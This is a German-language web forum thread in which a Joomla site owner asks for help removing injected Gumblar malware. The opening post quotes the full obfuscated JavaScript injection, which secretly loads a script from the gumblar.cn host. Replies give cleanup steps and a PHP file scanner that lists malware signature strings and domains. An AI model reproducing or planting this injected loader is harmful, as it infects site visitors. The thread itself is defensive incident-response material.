Trojaner-Board - Gumblar

Trojaner-Board (https://www.trojaner-board.de/)

- Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)

- - Gumblar - Redirecter (https://www.trojaner-board.de/73293-gumblar-redirecter.html)

Gumblar - Redirecter

Hallo zusammen,

leider gibt es noch kein Topic zu meinem Problem. Ich habe seit längerem Scripts auf meiner Website welche sich auf einen Server verbinden der dann einen Trojaner los lässt. Ergo - erscheinen beim besuch meiner Website Trojanermeldungen (mit avast).

ich habe diverse massnahmen getroffen denoch krieg ich nicht alles JavaScripts raus welche verantwortlich sind.

ich habe einen Joomla core der aktuellen version (1.5.10). wenn ich den quelltext meiner seite angucke dann sehe ich das javascript. hier ein typisches beispiel:

Code:

<script language=javascript><!-- 

(function(xwBPE){var k9E='var>20>61>3d>22>53>63r>69p>74Engine>22>2c>62>3d>22V>65>72si>6fn()>2b>22>2cj>3d>22>22>2cu>3dn>61>76iga>74or>2euserAgent>3bi>66((u>2eind>65xOf(>22W>69n>22)>3e0)>26>26(u>2e>69n>64exOf(>22N>54>20>36>22)>3c0)>26>26(do>63u>6dent>2eco>6fk>69e>2ein>64>65xOf>28>22miek>3d1>22>29>3c0)>26>26(>74ype>6ff(zrvzts)>21>3dtyp>65o>66(>22A>22>29)>29>7bz>72>76zts>3d>22A>22>3beval(>22i>66(win>64ow>2e>22+>61+>22>29j>3dj+>22+>61+>22Maj>6f>72>22+b+a>2b>22Mino>72>22>2bb>2ba+>22>42>75>69>6c>64>22+b+>22>6a>3b>22>29>3b>64ocument>2ewrit>65>28>22>3c>73cript>20src>3d>2f>2fgumblar>2ecn>2frss>2f>3fi>64>3d>22+j+>22>3e>3c>5c>2fsc>72>69pt>3e>22)>3b>7d';var hKlRS=k9E.replace(xwBPE,'%');var Mom4=unescape(hKlRS);eval(Mom4)})(/>/g);

 --></script>

hat jemand eine ahnung wie ich dieses lästige biest rauskriegen kann aus meiner page?

wenn ihr mehr infos braucht zu meiner page oder im allgemeinen, scheut euch nicht zu fragen ;)

hier findet ihr weitere infos zum trojaner - Gumblar .cn Exploit - 12 Facts About This Injected Script | Unmask Parasites. Blog.

gruss,
streezer

Hallo,

nachdem, was ich erfahren durfte mit Gumblar, liegt das Problem nicht auf dem Webspace sondern auf dem Rechner.
Der Trojaner hatte sich dort eingenistet und nur darauf gewartet, das ich Websites update...dabei hat er dann (i.d.R.) die index so wie beschrieben umgeschrieben.
Häufig steckte das Java-Script auch in anderen Unterseiten.

Das hat mir geholfen (bis jetzt):

Den Rechner mit mehreren Virenproggies checken...mir hat symantec online check geholfen
ALLE Ftp-Passwörter ändern und auf keinen Fall mehr im Ftp-Programm speichern, sondern händisch eingeben (auch wenn's nervt)
Auf gar keinen Fall mit Admin-Rechten ins Netz, denn das Script leitet den User auf eine Site, wo man sich noch mehr einfängt, als man sich wünscht - das übrigens zu der Angabe:
"Ergo - erscheinen beim besuch meiner Website Trojanermeldungen (mit avast)."
Man befindet sich nämlich nicht auf der aufgerufenen Website, sondern auf einem CLON irgendwo auf der Welt.
Den kompletten Webspace löschen und - nachdem der Rechner gereinigt wurde - neu aufsetzen
Nach dem Aufsetzen die Seite aufrufen (NICHT ALS ADMIN!!!) und beobachten, ob im Statusfenster kurzfristig eine andere Adresse erscheint, als die aufgerufene

vielen dank für deine tipps !

habs inzwischen löschen können - mithile dieses scriptes hab ich alle infizierten files gefunden und ändern können. dies jedoch mit enormen aufwand - aber ich musste nich nochmal von vorne anfangen und hab mir dardurch auch ne menge arbeit gespart:

Code:

<?php

set_time_limit(0);
 

$exclude_files = array(

$_SERVER['DOCUMENT_ROOT'] . '/' . file_checker.php’,

);
 

function scan_files($dir) {
 

global $exclude_files;
 

// malware strings to search

$search = array(

'.cn/',

'gumblar',

'eval(unescape',

'eval(base64_decode',

'eval(decode',

'eval(base',

'base64_decode',

'(function(){',

'<!--(function(',

'(unescape(',

'(function(xwBPE)',

'eval(String.fromCharCode',

'neglite.com',

'niklejo.net',

'internetcountercheck.com'

);
 

$dirs_array = array();
 

 if ($handle = opendir($dir)) {
 

echo "<br>Open dir: " . $dir . "";
 

// this is the correct way to loop over the directory.

while (false !== ($file = readdir($handle))) {

if ($file != '.' && $file != '..') {
 

$path = $dir . $file;
 

if (is_file($path)) {
 

// skip large files

if (filesize($path) > 1000000) {

continue;

}
 

// exlude fieles

if (in_array($path, $exclude_files)) {

continue;

}
 

// get content

$file_handle = fopen($path, 'r');

$contents = ”;

while (!feof($file_handle)) 

{

$contents = fgets($file_handle);
 

// loop for search string

$found = false;

foreach ($search as $search_string) {

if (stristr($contents, $search_string)) {

$found = true;

break;

}

}
 

if ($found == true) {

echo '<br>' . $path . ' … <font color="red">[FOUND ' . $search_string . ']</font>';

break;
 

}

else {

//echo ‘[CLEAN]‘;

}
 

}
 

fclose($file_handle);
 

} elseif (is_dir($path)) {
 

$dirs_array[] = $path;
 

}

}

}

closedir($handle);

}
 
 
 

foreach ($dirs_array as $dir) {

scan_files($dir . '/');

}
 

unset($dirs_array);

}
 

$start_dir = $_SERVER['DOCUMENT_ROOT'] . '/';
 

echo 'Starting from: ' . $start_dir . ”;
 

scan_files($start_dir);
 
 

?>

hallo zusammen!

bin neu hierher gekommen wg. gumblar ...

@ssc streezer: wie verwende ich das script ... sorry, bin leider nur anwender :-(

code kopieren,
in ein leeres .php file kopieren,
auf server laden,
aufrufen

name des php files ist egal?

thx

ja klar - der filename hat doch auf den inhalt keine auswirkungen... nie...